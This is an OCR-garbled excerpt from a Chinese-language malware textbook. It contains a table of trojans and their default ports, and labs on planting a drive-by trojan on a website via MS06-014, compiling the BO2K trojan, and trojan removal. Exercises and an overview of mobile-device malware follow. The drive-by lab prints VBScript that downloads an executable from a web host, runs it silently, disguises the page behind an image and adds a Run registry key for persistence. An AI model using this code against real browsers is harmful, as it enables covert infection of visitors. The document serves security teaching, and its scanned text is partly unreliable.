Der Spaeher 1000 WinCrase 4092 
Silencer 1001 FileNail 4567 
WebEx 1001 IcqTrojan 4950 
Doly Trojan 1011 Sockets de Troie 5000 
Doly Trojan 1015 Sockets de Troie 1. x 5001 
Netspy 1033 OOTLT Cart 5011 
Bla 1.1 1042 NetMetro 5031 
Psyber Stream Server 1170 Firehotcker 5321 
Streaming Audio 1170 BackConstruction 1.2 5400 
SoftWar 1207 BladeRunner 5400 
Ultors Trojan 1234 BladeRunner 1. x 5401 
SubSeven 1243 BladeRunner 2. x 5402 
VooDoo Doll 1245 Jllusion Mailer 5521 
GabanBus 1245 Xtcp 5550 
NetBus 1245 RoboHack 5569 
Maverick’s Matrix 1269 Wincrash 5742 
FTP99CMP 1492 The thing 6000 
Psyber Streaming Server 1509 The thing 6400 
Shiva Burka 1600 Vampire 6669 
SpySender 1807 HostControl 6669 
ShockRave 1981 Deep Throat 6670 
BackDoor 1999 Deep Throat 6771 
Transcout 1999 DeltaSource 6883 
DerSpaeher 2000 Heep 6912 
Trojan Cow 2001 Remote Grab 7000 
Pass Ripper 2023 NetMonitor 7300 
Bugs 2115 NetMonitor 1. x 7301 


第 5 章 特洛伊 木马 163 
续 表 
木马 名 称 端 口 木马 名 称 端 口 
NetMonitor 2. x 7306 GirlFriend 21544 
NetMonitor 3.x 7307 Schwindler 1. 82 21554 
NetMonitor 4. x 7308 GirlFriend 21554 
Qaz 7597 Prosiak 22222 
ICQKiller 7789 Evil FTP 23456 
InCommand 9400 Ugly FTP 23456 
Portalof Doom 9872 WhackJob 23456 
Portalof Doom 1. x 9873 Ugly FTP 23456 
Portalof Doom 2. x 9874 Delta 26247 
Portalof Doom 3.x 9875 AOLTrojan 1.1 30029 
iNi-Killer 9989 NetSphere 30100 
The Prayer 9999 Masters Paradise 30129 
Portalof Doom 4. x 10067 Socket23 30303 
Portalof Doom 5. x 10167 Kuang 30999 
Coma 10607 BackOrifice 31337 
Ambush 10666 DeepBO 31338 
Senna Spy 11000 NetSpy DK 31339 
HostControl 11050 BOWhack 31666 
ProgenicTrojan 11223 Prosiak 33333 
Gjamer 12076 Trojan Spirit 2001 33911 
Hack’99 KeyLogger 12223 Tiny TelnetServer 34324 
NetBus 1. x 12346 BigGluck 34324 
Whack-a-Mole 12361 Yet Another Trojan 37651 
Whack-a-Mole 1. x 12362 The Spy 40412 
Eclipse 2000 12701 Masters Paradise 40421 
Priotrity 16969 Masters Paradise 1. x 40422 
Kuang2 the Virus 17300 Masters Paradise 2. x 40423 
Millenium 20000 Masters Paradise 3. x 40426 
Millennium 20001 Sockets de Troie 50505 
NetBus Pro 20034 Fore 50766 
Logged! 20203 Remote win shutdown 53001 
Chupacabra 20203 Schoolbus 54321 
Bla 20331 Net Raider 57341 
5.5 综合 实验 


综合 实验 四 : 网 站 挂 马 实验 


该 实验 所 用 的 挂 马 方法 利用 了 MS06-014 漏洞 。 该 漏洞 是 Windows 的 RDS. Dataspace 
ActiveX 实现 上 存在 漏洞 ,远程 攻击 者 可 能 利用 此 漏洞 获取 主机 的 控制 。 
根据 微软 的 描述 ,在 某 些 情况 下 .MDAC 所 捆绑 的 RDS. Dataspace ActiveX 控件 无 法 
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确保 能 够 进行 安全 的 交互 ,导致 远程 代码 执行 漏洞 ,成 功利 用 这 个 漏洞 的 攻击 者 可 以 完全 控 
制 受 影响 的 系统 。 

【实验 目的 】 

通过 该 实验 掌握 网 站 挂 马 的 方法 。 

【实验 环境 】 

(1) Windows 2000 Professional SP4 。 

1 

03 BES. %, 

【实验 素材 】 

本 书 配 套 素材 目录 experimemt\ms06014。 

【实验 步骤 】 

(1) 环境 准备 。 如 图 5-7 所 示 , 把 这 些 文件 用 IIS 发 布 。 其 中 WriteReg. exe 可 以 不 发 
布 。WriteReg. exe 和 WriteReg. pdf 内 容 完 全 一 致 ,只 是 扩展 名 不 同 而 已 。 这 样 做 的 目的 
是 更 加 便于 隐藏 。 


2010-4-20 | 
2010-4-20 | 
MS06-014 | 2010-4-20 | 
pe ,2010-4-20 | 
2010-4-20¢| 
188KB PDF 文件 2010-4-20€| 


选 定 项 目 可 以 查看 其 说 明 。 
另 请 参阅 


加 上 邻居 
我 的 电脑 


| 
图 5-7 Web 发 布 路 径 及 文件 


(2) 检查 是 否 存 在 该 漏洞 。MS06-014 是 一 个 过 时 的 漏洞 ,在 更 新 及 时 的 操作 系统 中 不 
存在 该 漏洞 。 如 果 不 存在 该 漏洞 , 则 无 法 进行 后 续 实验 。 检 查 当 前 操作 系统 是 否 存 在 该 漏 
洞 的 代码 ,如 图 5-8 所 示 。 

(3) 准备 一 个 简单 的 木马 。 本 实验 提供 的 实验 程序 不 是 真正 的 木马 ,仅仅 是 一 个 应 用 
程序 。 该 程序 是 个 可 执行 程序 , 它 要 被 挂 到 网 站 上 ,等 着 别人 来 上 钧 。 该 程序 的 功能 是 执行 
后 把 自己 改名 称 并 存储 到 System32 系统 目录 下 ; 通过 修改 注册 表 , 实 现 自 加 载 。 

(4) 挂 马 核 心 代码 。 网 站 挂 马 的 核心 代码 如 图 5-9 所 示 。 

(5) 进一步 伪装 。 尽 管 图 5-9 中 的 代码 可 以 实现 木马 的 植 入 及 在 被 控制 端的 首次 运 
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head>Ctitle) 粒 测 WS06-014 漏 洞 Ytitle> 
《seript langeuaee=YBSeript> 

on error resune next 

Set zero = document. createElement 


Cob” & “ject”) 
zero. setAttribute “cl” & “assid”, 
str3 = "Ad” & “odb. St” & "rean 
set 了 = zero, createobject (str3, ") 
if Not Err. Hunber = 0 then 

err. clear 


docunent write (” et color=00FF00》 黑 客 风云 友情 提示 : 恭喜 悠 的 系统 不 存在 HS06-014 泌 洞 。 


人 ffont></CENTER> 
a 


docunent, write ("dCENTER>Kfont color=00FF00 黑 客 风云 友情 提示 : 


危险 修 的 系统 存在 WS06 
er: a href= http://www. nicrosoft. com/china/technet/security/bulletin/ms06- 


014.mspx Shttp://werw. microsoft. com/china/ technet/security/bulletin/ms06- 
O14. mspx/ a> Eont > /CENTER>") 


& “sid:BD” A “96C556-65A3-11D0-983A-00C04” & “FC29E36" 


一 014 漏 洞 9 ?9 


图 5-8 漏洞 检测 代码 


htnld | 
seript Tangusge="VESeript”> 
tj_ads = “http;//mew. xxx. eon/server. exe” 
tj_ads = “http://192, 168. 1. 112/testtrojgn/writereg paf” 
Sat df = document. createElenent ("object”) 
df. sethttribute “classid”, “clsid:BD9GCS58-65A3-11D0-983A-00CO4FC29E36" 
str="Microsoft. XMLMTTPY 
Set x = df. CreateDbject [str 
str="Adodb. Stream 


Set Sour = df, createobject (str, *”) 

Sour, type =1 

x Dpen “GET”, tj_ads, False 

x. Send 

tj_nane="writereg, exe” “可 改 为 木马 的 文件 名 称 

sat 了 = df createobject (“Seripting FileSystenObject”, *") 


set sys32 = FGetSpecialFolder (1) “0 Windows 文件 洋 ，1 windows\system32 文件 夹 ，2 组 存 文件 夹 
tj_name= F. BuildPath(sys32, tj_name) 
Sour, open 


Sour write x.responseBody 
Sour savetofile tj_nane,2 
Sour, close 

Set R_tj = df. createobjee 
R_tj, ShellExecute tj_name 
seript> 

Chody> 


tH oy 
open”, 0 


图 5-9 网 站 挂 马 核 心 代码 


行 ,但 是 却 容易 被 发 现 。 图 5-10 将 进一步 伪装 挂 马 核心 代码 。 
es jpg) ,但 是 后 
的 代码 , 即 图 5-5 所 示 的 代码 。 


se. jpg》 
:77192. 168.1. 112/testtrojan/ms06-014. htm” hei 


经 过 该 部 分 代码 的 伪装 , 受 


人 台 却 运行 了 ms06-014. htm 


图 5-10 伪装 代码 


(6) 执行 过 程 。 当 浏览 网 站 的 用 户 访问 http://192. 168. 1. 112Vtesttrojan/ 时 ,默认 访 
问 了 其 中 的 default. htm。 该 网 页 呈现 给 用 户 的 是 一 张 图 片 ( 日 食 图 片 ), 但 后 台 却 运行 了 
ms06 一 014. htm 这 个 挂 马 网 页 。 执 行 后 ,writereg. pdfj 就 下 载 到 了 用 户 的 本 地 。 经 过 自动 


改名 为 writereg. exe, 进 行 了 自动 的 首次 运行 ,如 图 5-11 所 示 。 


(7) 最 后 结果 。 经 过 运行 后 ,在 被 挂 马 机 器 上 出 现 的 结果 有 以 下 两 个 。 


@ 用 户 机 器 的 System32 目录 下 存在 writereg. exe。 
@ 用 户 机 器 的 注册 表 项 中 存在 自动 运行 项 , 即 : 


[HKEY_LOCAL MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"crossbow" = "C:\\WINNT\ 


\system32\\writereg. exe" 
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下 http://192.168.1.112/testtrojany - Microsoft Internet Explorer - [ 脱 机 工作 ] 
| 文件 ”编辑 (日 ”查看 (WD 收 总 (4) 工具 (D 帮助 (由 
-EE- -人 | 人 Q 挝 因 收 戈 多 下 | 轩 - 号 
(EO |€) hetp://192.168,1.1121testtrojan} 了 e 苇 到 | | 链接 ” 


2] 完成 屋 厂 | 疙 Intemet 


| | a ||| hp: se.168.1.112nes,.. 15 回 昌 les 


图 5-11 运行 效果 


综合 实验 五 : BO2K 木马 实验 


【实验 目的 】 
(1) 熟悉 BO2K 木马 的 源 代码 。 


(2) 掌握 BO2K 木马 的 原理 和 用 法 。 

【实验 环境 】 

(1) Windows 32 位 操作 系统 

(2) Visual Studio 6. 0 编译 于 

【实验 步骤 】 

从 网 上 下 载 文件 中 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 : 本 书 配套 素材 目录 
\Experiment\BO2K\)。 文 件 为 工程 文件 bo2k. dsw。 使 用 Visual Studio 6. 0 编译 该 工程 ， 
编译 过 程 中 需要 修改 配置 。 

链接 生成 bo2k. exe 可 执行 程序 以 及 客户 端 程序 bo_client. exe。 执 行 bo2k. exe 和 
bo_client. exe 观察 执行 效果 。 

【实验 注意 事项 】 

程序 的 设计 思路 参考 下 载 文 件 ( 文 档 位 置 : 解压 缩 目 录 \Experiment\bo2k\doc\ 设 计 文 
档 . doc 和 解压 缩 目 录 \Experiment\bo2k\doc\ 使 用 方法 . doc) 。 


综合 实验 六 : 木马 病毒 清除 实验 


【实验 目的 】 
掌握 木马 病毒 清除 的 基本 原理 。 
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【实验 环境 】 

(1) Windows 32 位 操作 系统 。 

(2) Visual Studio 7. 0 编译 环境 。 

【实验 步骤 】 

从 网 上 下 载 文件 中 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 : 本 书 配套 素材 目录 
\Experiment\Antitrojan\)。 文 件 Antitrojan. sln 为 工程 文件 。 使 用 Visual Studio 7. 0 编 
译 该 工程 ,生成 Antitrojan. exe 可 执行 程序 。 执 行 Antitrojan. exe 观察 执行 效果 。 

【实验 注意 事项 】 

程序 的 设计 思路 参考 下 载 文 件 ( 文 档 位 置 : 解压 缩 目 录 \Experiment\ Antitrojan\doc\ 
设计 文档 . doc) 。 


5.6 习 题 
一 、 填空 题 
1. 特洛伊 木马 作为 一 种 特殊 的 计算 机 病毒 ,其 首要 特征 是 6 
2. 从 编程 框架 上 来 看 ,特洛伊 木马 是 一 种 基于 模式 的 远程 控制 程序 ,通过 这 
个 控制 程序 ,黑客 可 以 远程 控制 被 控制 端 。 
3. 反弹 式 木马 使 用 的 是 端口 ,系统 会 认为 木马 是 普通 应 用 程序 ,而 不 对 其 连 
接 进 行 检查 。 
4. Socket 技术 是 通信 和 领域 的 基石 ,也 是 特洛伊 木马 的 核心 技术 之 一 。 用 户 常 用 的 两 种 
套 接 字 是 和 
二 、 选择 题 
1. 著名 特洛伊 木马 “网 络 神偷 ”采用 的 是 ( ) 隐 藏 技术 。 
A. 反弹 式 木马 技术 B. 远程 线程 插入 技术 
C. ICMP 协议 技术 D. 远程 代码 插入 技术 
2. 下 列 ( ) 不 是 常用 程序 的 默认 端口 。 
A. 80 B. 8080 区 中 动弹 
三 、 思 考题 


1. 特洛伊 木马 是 一 种 具有 远程 控制 功能 的 特殊 计算 机 病毒 ,请 论述 木马 .普通 计算 机 
病毒 和 远程 控制 程序 之 间 的 关系 。 

2. 从 对 用 户 危 害 的 角度 ,探讨 特洛伊 木马 的 特殊 之 处 。 

3. 近年 来 ,特洛伊 木马 成 为 了 继 蠕虫 之 后 的 热点 病毒 , 试 述 普 通 计算 机 用 户 如 何 预 防 
特洛伊 木马 。 

4. 论述 特洛伊 木马 技术 的 发 展 趋势 和 最 新 动向 。 

四 、 实 操 题 

1. 学 习 并 实践 原理 型 的 特洛伊 木马 程序 。 

2. 完成 一 个 常见 木马 的 手工 检测 和 清除 过 程 。 
3. 学 习 并 实践 特洛伊 木马 清除 程序 。 
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恶意 代码 


2004 年 6 月 ,国际 病毒 组 织 29A 发 布 了 首 例 真 正 意义 上 的 概念 性 手机 病毒 一 一 Cabir。 
截止 到 2012 年 年 底 , 仅 Android 平台 上 的 恶意 代码 数量 就 已 经 高 达 35 万 个 。 据 国际 知名 
的 G Data 安全 公司 预测 ,到 2017 年 年 底 ,Android 平台 上 新 产生 的 恶意 代码 样本 数量 将 达 
到 350 万 个 。 在 尽情 享受 智能 手机 、 平 板 电脑 等 移动 智能 终端 带 来 的 便捷 时 ,这 些 时 尚 的 设 
备 会 给 人 们 带 来 安全 威胁 。 由 于 现在 的 手机 、 平 板 电脑 等 都 具有 上 网 的 功能 ,这 就 大 大 增加 
了 这 些 设备 感染 恶意 代码 的 概率 。 当 前 ,大 量 私密 信息 和 商务 信息 存储 在 移动 终端 设备 上 ， 
一 旦 这 些 设备 受到 恶意 代码 的 入 侵 , 其 杀伤 力 将 远 远 大 于 入 侵 计算 机 载体 的 恶意 代码 。 

本 章 将 以 智能 手机 恶意 代码 为 主线 ,介绍 移动 智能 终端 恶意 代码 的 概念 、 技 术 进 展 和 防 
范 工具 ,使 读者 了 解 移动 终端 设备 上 的 未 来 威胁 。 

本 章 学 习 目 标 

(1) 了 解 移动 终端 基本 概念 。 

(2) 掌握 移动 终端 恶意 代码 的 基本 概念 。 

(3) 了 解 移动 终端 操作 系统 。 

(4) 了 解 移动 终端 恶意 代码 的 危害 和 防范 。 

(5) 了 解 移动 终端 杀毒 工具 。 


6.1 移动 终端 恶意 代码 概述 


据 QYR 研究 中 心 预测 ,2017 年 全 球 手 机 出 货 量 将 超过 20 亿 台 (其 中 智能 手机 占 15. 3 
亿 台 ) ,同比 2016 年 增长 2%。 中 国 在 全 球 智能 手机 市 场 中 所 占据 的 份额 约 为 31% ,成 为 全 
球 最 大 的 智能 手机 市 场 。 随 着 越 来 越 多 富裕 的 消费 者 选择 功能 更 丰富 的 智能 手机 ,到 2017 
年 年 底 , 中 国 智能 手机 的 销量 有 望 攀升 到 4.7 亿 台 。 

中 国 工 业 与 信息 化 产业 部 发 布 了 2017 年 上 半年 通信 行业 的 运营 数据 ,数据 显示 ,目前 
我 国 移动 电话 用 户 总 数 已 经 达到 13. 6 亿 人 ,其 中 通过 手机 上 网 用 户 数 已 经 突破 11 亿 人 。 
另 一 方面 ,市 场 的 突飞猛进 与 Android 手机 的 大 行 其 道 也 不 无 关系 。 根 据 研究 机 构 Gartner 
的 数据 ,OPPO、 华 为 .Vivo、 小 米 等 主打 Android 产品 的 厂商 在 市 场 占有 率 排名 中 都 名 列 前 茅 。 

在 智能 手机 大 行 其 道 的 同时 , 受 经 济 利益 驱使 而 产生 的 感染 智能 手机 的 恶意 代码 日 益 
增加 ,移动 终端 恶意 代码 的 发 展 方向 也 转 为 私自 定制 收费 服务 、 网 络 钓 鱼 、 间 谍 软 件 、 特 洛 仇 
木马 勒索 型 恶意 代码 等 。 

国际 知名 的 安全 厂商 McAfee 表示 ,进入 2010 年 ,智能 手机 恶意 代码 进入 空前 活跃 期 ， 
正 以 每 天 4 一 5 种 的 速度 增长 ,2010 年 年 底 ,智能 手机 恶意 代码 将 超过 2000 种 。 此 后 的 几 
年 ,Android 上 的 恶意 代码 可 谓 是 突飞猛进 。 国 际 知名 的 G Data 安全 公司 给 出 了 2012 年 
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到 2017 年 Android 平台 每 年 新 出 的 恶意 代码 样本 数量 (图 6-1) 。 其 中 ,2017 年 第 一 季度 新 
增 样本 量 为 75. 5 万 个 ,并 据 此 预测 年 度 新 增 样本 量 为 350 万 个 。 


Android 平 台 年 新 增 恶意 代码 样本 数量 (单位 : 万 ) 


300 
5 233.3 
200 
154.8 

150 上 19.2 
100 

50 —21.4 

0 [= 


2012 年 | 2014 年 。 2015 年 ”2016 年 ”2017 年 


图 6-1 2012 一 2017 年 Android 平台 新 增 恶 意 代 码 样 本 数量 (数据 来 源 G Data) 

2017 年 第 一 季度 ,360 互联 网 安全 中 心 共 截 获 安 卓 平台 新 增 恶 意 程 序 样本 222. 8 万 个 ， 
平均 每 天 截获 新 增 手机 恶意 程序 样本 近 2. 5 万 个 。 累 计 监 测 到 移动 终端 用 户 感染 恶意 程序 
5812.7 万 人 次 ,平均 每 天 恶意 程序 感染 量 达到 了 64. 6 万 人 次 (图 6-2)。 自 2012 年 以 来 , 移 
动 端 从 几 十 万 跨越 到 千 万 级 别 恶意 样本 ,显示 了 移动 恶意 程序 总 体 进入 平稳 高 发 期 。 


恶意 代码 新 增 量 (单位 : 万 ) 感染 量 (单位 : 万 ) 
Wa 


图 6-2 2017 年 第 一 季度 Android 恶意 软件 情况 (数据 来 源 360) 


移动 终端 (Mobile Terminal, MT) 涵 盖 现 有 的 和 即将 出 现 的 各 式 各 样 ,功能 繁多 的 手机 
和 PDA(Personal Digital Assistant, 个 人 数字 助理 ) 。 随 着 无 线 移动 通信 技术 和 应 用 的 发 
展 , 它 使 现 有 的 手持 设备 功能 变 得 丰富 多 彩 . 它 可 以 照相 ,摄像 , 可 以 是 一 个 小 型 移动 电视 
机 、 也 可 以 是 可 视 电话 机 ,并 具有 PC 的 大 部 分 功能 ,当然 它 也 可 以 用 于 移动 电子 商务 ,可 作 
认证 ,将 来 还 可 作 持 有 者 身份 证 明 ( 身 份 证 .护照 ) , 它 也 是 个 人 移动 娱乐 终端 。 总 之 ,移动 终 
端 可 以 在 移动 中 完成 语音 ,数据 和 图 像 等 各 种 信息 的 交换 和 再 现 。 

迄今 为 止 ,移动 终端 恶意 代码 没有 明确 的 定义 。 在 国内 ,普遍 接受 的 手机 恶意 代码 的 定 
义 是 :“ .手机 恶意 代码 和 计算 机 恶意 代码 类 似 , 它 以 手机 为 感染 对 象 ,以 手机 网 络 和 计算 机 
网 络 为 平台 ,通过 恶意 短信 ,不 良 网 站 ,非法 复制 等 形式 ,对 手机 进行 攻击 ,从 而 造成 手机 异 
常 的 一 种 新 型 恶意 代码 .” 以 此 为 参考 .并 结合 恶意 代码 的 描述 ,给 出 移动 终端 恶意 代码 定义 
如 下 。 

移动 终端 恶意 代码 是 对 移动 终端 各 种 恶意 代码 的 广义 称呼 , 它 包 括 以 移动 终端 为 感染 
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对 象 而 设计 的 普通 病毒 .木马 等 。 移 动 终端 恶意 代码 以 移动 终端 为 感染 对 象 , 以 移动 终端 网 
络 和 计算 机 网 络 为 平台 ,通过 无 线 或 有 线 通信 等 方式 ,对 移动 终端 进行 攻击 ,从 而 造成 移动 
终端 异常 的 各 种 不 良 程序 代码 。 


6.2 智能 手机 操作 系统 及 其 弱点 


2010 年 以 来 ,出 现 过 Android、iOS、Windows Phone 等 多 种 智能 手机 操作 系统 ,市 场 竞 
争 已 经 十 分 激烈 。 经 过 多 年 的 市 场 选择 ,Android 和 iOS 的 大 行 其 道 已 经 让 其 他 众多 的 优 
秀 的 手机 智能 操作 系统 黯然 失色 ,两 者 综合 起 来 可 以 说 已 经 占据 了 大 多 数 的 智能 手机 市 场 。 
图 6-3 所 示 为 2016 年 智能 手机 操作 系统 市 场 份额 统计 图 ,其 中 ,图 6-3(a) 所 示 的 是 调查 统 
计 机 构 Kantar 发 布 的 截止 到 2016 年 12 月 的 中 国 智能 手机 操作 系统 的 份额 数据 。 
图 6-3(b) 所 示 的 是 调查 统计 机 构 NetApplicaitons 发 布 的 截止 到 2016 年 8 月 的 全 球 智能 手 
机 操作 系统 的 份额 数据 。 


中 国 智能 手机 操作 系统 份额 (2016 年 12 月 ) 全 球 智能 手机 操作 系统 份额 (2016 年 8 月 ) 
Windows Windows Java ME,0.014 
Phone, Phone, | 其 他 , 0.02 


Android, 
0.66 


Android, 
0.807 


(a) 中 国 份额 (数据 来 源 : Kantar) (b) 全 球 份额 (数据 来 源 : NetApplicaitons) 
图 6-3 2016 年 智能 手机 操作 系统 市 场 份额 统计 图 


6.2.1 智能 手机 操作 系统 


尽管 有 很 多 智能 手机 操作 系统 ,但 近 两 年 已 经 逐步 稳定 在 Android 和 iOS 两 大 系统 上 ， 
其 他 系统 基本 上 丧失 了 竞争 力 。 
1. Android 


Android 是 Google 公司 在 2007 年 11 月 公布 的 基于 Linux 平台 的 开源 智能 手机 操作 
系统 。Android 由 操作 系统 、 中 间 件 和 应 用 程序 组 成 ,是 首 个 为 移动 终端 打造 的 真正 开放 和 
完整 的 移动 软件 。 它 采用 了 软件 栈 (Software Stack) 的 架构 ,底层 以 Linux 核心 为 基础 ,并 
且 只 提供 基本 功能 。 在 底层 平台 上 ,第 三 方 应 用 软件 则 由 各 公司 自行 开发 ,开发 语言 是 跨 平 
台 的 Java 编程 语言 。 为 了 推广 此 技术 ,Google 和 其 他 几 十 个 手机 公司 建立 了 开放 手机 联 
盟 (Open Handset Alliance,OHA). 
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Android 发 展 迅速 , 技 术 更 新 非常 快 。 截止 到 2018 年 8 月 8 日 ,最 新 的 发 布 版 本 已 经 
更 新 到 9. 0 版 。 能 顺利 运行 在 32 位 或 64 位 ARM、x86、x86-64、MIPS 和 MIPS64 等 流行 芯 
上 上 E5 

在 所 有 智能 手机 操作 系统 中 ,Android 的 用 户 量 也 是 占有 绝对 的 领先 地 位 的 。 据 维基 
百科 的 数据 ,截止 到 2017 年 5 月 ,Android 的 月 均 活 动用 户 量 达 到 20 亿 人 。 

Android 包括 操作 系统 .中 间 件 和 应 用 程序 ,因此 , 圳 括 了 移动 电话 工作 所 需 的 全 部 软 
件 ,而 且 不 存在 任何 以 往 阻 碍 移动 产业 创新 的 专 有 权 障 碍 。Google 与 开放 手机 联盟 OHA 
合作 开发 了 Android, 这 个 联盟 由 包括 中 国 移动 、 摩 托 罗 拉 、 高 通 、 宏 达 和 T-Mobile 在 内 的 
30 多 家 技术 和 无 线 应 用 的 领军 企业 组 成 。 通 过 与 运营 商 、 设 备 制 造 商 . 开 发 商 和 其 他 有 关 
各 方 结 成 深层 次 的 合作 伙伴 关系 ,Google 希望 借助 建立 标准 化 .开放 式 的 移动 电话 软件 平 
台 ,在 移动 产业 内 形成 一 个 开放 式 的 生态 系统 。 

Android 的 一 个 重要 特点 就 是 它 的 应 用 框架 和 GUI 库 都 用 Java 语言 实现 。Android 
内 部 有 一 个 称 为 Dalvik 的 Java 虚拟 机 ,Java 程序 由 这 个 虚拟 机 解释 运行 。Android 平台 的 
应 用 程序 也 必须 用 Java 语言 开发 。Android 应 用 框架 采用 了 Mash-up 的 组 件 模型 : 组 件 
(Activity) 向 系统 注册 自己 的 功能 ,每 个 组 件 要 使 用 其 他 组 件 的 服务 时 提出 自己 的 要 求 
(Intent) ,系统 根据 Intent 在 已 登记 的 组 件 中 确定 合适 的 组 件 。 在 应 用 程序 层 , Android 提 
供 的 NDK 可 以 供 开发 者 使 用 其 他 高 级 语言 编写 程序 。 

2. iOS 

iOS 是 由 苹果 公司 开发 的 手持 设备 操作 系统 。 凭 借 出 色 的 用 户 体验 , 众 多 丰富 的 软件 
支持 ,加 上 硬件 上 的 精益 求 精 , 在 苹果 出 色 的 营销 体系 下 ,iOS 打败 了 众多 的 新 老 对 手 , 短 短 
几 年 间 迅 速 建立 了 庞大 的 市 场 和 用 户 群 ,获得 了 出 色 的 口碑 。 截 止 到 2017 年 11 月 ,iOS 是 
仅 次 于 Android 的 第 二 大 智能 终端 设备 操作 系统 。 在 iOS 的 应 用 市 场 中 有 220 万 个 各 式 应 
用 程序 ,总 计 下 载 次 数 累 计 达 到 1300 亿 次 。 

截至 2018 年 9 月 ,iOS 的 最 新 版 已 经 更 新 到 12。 苹 果 公 司 最 早 于 2007 年 1 月 9 日 的 
Macworld 大 会 上 公布 这 个 系统 ,最 初 是 设计 给 iPhone 使 用 的 ,后 来 陆续 套用 到 iPod 
touch \iPad 以 及 Apple TV 等 苹果 产品 上 。iOS 与 苹果 的 Mac OS X 操作 系统 一 样 , 它 也 是 
以 Darwin 为 基础 的 ,因此 同样 属于 类 UNIX 的 商业 操作 系统 。 原 本 这 个 系统 名 为 iPhone 
OS, 直 到 2010 年 6 月 7 日 WWDC 大 会 上 宣布 改名 为 iOS。 

iOS 的 系统 结构 分 为 四 个 层次 : 核心 操作 系统 (the Core OS Layer)、 核 心服 务 层 (the 
Core Services Layer)、 媒 体 层 (the Media Layer) 和 Cocoa 触摸 框架 层 (the Cocoa Touch 
Layer) 。 

3. Windows Phone 

Windows Phone 是 微软 发 布 的 一 款 手机 操作 系统 , 它 将 微软 旗下 的 Xbox Live 游戏 、 
Xbox Mnusic 音乐 与 独特 的 视频 体验 整合 至 手机 中 。2010 年 10 月 11 日 晚上 9 点 30 分 , 微 
软 公 司 正式 发 布 了 智能 手机 操作 系统 Windows Phone, 同 时 将 谷歌 的 Android 和 苹果 的 
iOS 列 为 主要 竞争 对 手 。 

Windows Phone 具有 桌面 定制 .图 标 拖 电 、 滑 动 控制 等 一 系列 前 卫 的 操作 体验 。 其 主 
屏幕 通过 提供 类 似 仪 表盘 的 体验 来 显示 新 的 电子 邮件 、 短 信人、 未 接 来 电 、 日 历 约会 等 ,让 人 们 
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对 重要 信息 保持 时 刻 更 新 。 它 还 包括 一 个 增强 的 触摸 屏 界 面 ,更 方便 手指 操作 ; 以 及 一 个 
最 新 版 本 的 IE Mobile 浏览 器 一 一 该 浏览 器 在 一 项 由 微软 赞助 的 第 三 方 调查 研究 中 ,与 参 
与 调研 的 其 他 浏览 器 和 手机 相 比 ,可 以 执行 指定 任务 的 比例 超过 高 达 48%。 

2015 年 Windows Phone 正式 谢幕 ,取而代之 的 是 Windows 10。2015 年 1 月 ,微软 召 
开 主 题 为 Windows 10 发 布 会 ,发 布 会 上 提出 Windows 10 将 是 一 个 跨 平台 的 系统 ,无 论 手 
机 、 平 板 电脑 .笔记 本 电脑 二 合 一 设备 .PC, Windows 10 将 全 面 通用 。 这 也 就 意味 着 
Windows Phone 品牌 将 正式 终结 ,被 统一 命名 的 Windows 10 所 取代 。 

4. Symbian 

1998 年 6 月 ,由 爱立信 ,诺基亚 、 摩 托 罗 拉 和 Psion 共同 出 资 ,筹建 了 Symbian 公司 。 
Symbian 公司 以 开发 和 供应 先进 、 开 放 、 标 准 的 手机 操作 系统 Symbian OS 为 目标 ,同时 向 
那些 希望 开发 基于 Symbian OS 产品 的 厂商 发 放 软 件 许可 证 。 曾 经 ,围绕 着 Symbian OS 开 
发 和 生产 的 一 系列 软 硬 件 产品 ,在 全 球 掌上 电脑 和 智能 手机 市 场 上 占据 了 大 部 分 的 份额 。 
Symbian 的 优势 在 于 它 得 到 了 占据 市 场 份额 大 多 数 的 手持 通信 设备 厂商 的 支持 ,在 Nokia 
的 大 力 倡导 下 ,成 为 一 个 开放 的 、 易 用 的 专业 的 开发 平台 ,支持 Ct+ 和 Java 语言 。 同 时 对 
以 下 方面 提供 平台 级 支持 。 

(1) 协议 标准 : TCP IPv4 IJPv6 Bluetooth Java、WAP .SyncML 以 及 USB。 

(2) 通信 能 力 : 支持 多 任务 、 面 向 对 象 基于 组 件 方式 的 2G、2. 5G 和 3G 系统 及 应 用 开 
发 ,GSM、GPRS、HSCSD、EDGE、CDMA(IS-95) 以 及 2000 技术 支持 。 

(3) 信息 定制 : SMS、.EMS、MMS、EMAIL 和 FAX 支持 。 

(4) 应 用 丰富 : 名 片 管理 .通讯 录 和 信息 服务 等 。 

(5) 安全 稳定 : 数据 完整 性 支持 .可 靠 高 效 的 电池 管理 ,数据 同步 ,数据 加 密 ,证书 管理 
以 及 软件 安装 管理 。 

(6) 多 媒体 : 图 片 .音乐 甚至 视频 浏览 。 

(7) Internet: 因特网 连接 ,浏览 以 及 内 容 下 载 ,POP3/SMTP/IMAP4。 

(8) 国际 化 : 支持 Unicode、 多 种 字体 和 文字 格式 。 

诺基亚 的 Symbian 操作 系统 运行 速度 非常 出 色 和 稳定 ,软件 成 品 内 存 占用 相对 较 低 。 
但 是 , 它 对 软件 人 员 的 要 求 也 相对 较 高 ,尽管 它 的 Symbian C++ 开 发 平台 的 环境 相 比 几 年 前 
已 经 有 了 较 大 的 改观 ,但 是 其 相对 简单 的 文档 资料 和 尚 不 够 完善 的 开发 环境 ,依然 对 开发 者 
的 素质 要 求 甚 高 ,这 影响 了 不 少 开发 人 员 进 入 手机 软件 领域 。 

5. Linux 


应 用 于 智能 手机 上 的 Linux 操作 系统 和 人 们 常 说 的 应 用 于 计算 机 上 的 Linux 操作 系统 
是 一 样 的 ,而 且 都 是 全 免费 操作 系统 。 在 操作 系统 上 的 免费 ,就 等 于 节省 了 产品 的 生产 成 本 。 

Linux 操作 系统 系统 资源 占用 率 较 低 ,而 且 性 能 比较 稳定 ,这 都 是 大 家 公认 的 。 如 果 以 
Linux 平 台 的 系统 资源 占用 程度 与 体积 庞大 的 Windows Mobile 相 比 ,其 结果 可 想 而 知 。 

Linux 操作 系统 与 Java 的 相互 融合 ,是 任何 一 个 操作 系统 所 不 能 比拟 的 ,Linux 加 Java 
的 应 用 方式 ,能够 给 用 户 极 大 的 拓展 空间 。 

不 过 ,Linux 操作 系统 也 不 是 十 全 十 美的 。 由 于 它 介 入 智能 手机 领域 较 晚 ,采用 此 操作 
系统 的 手机 基本 只 有 摩托 罗拉 的 少 部 分 机 型 (如 A780、E680 和 A768i) ,因此 专 为 这 些 少量 
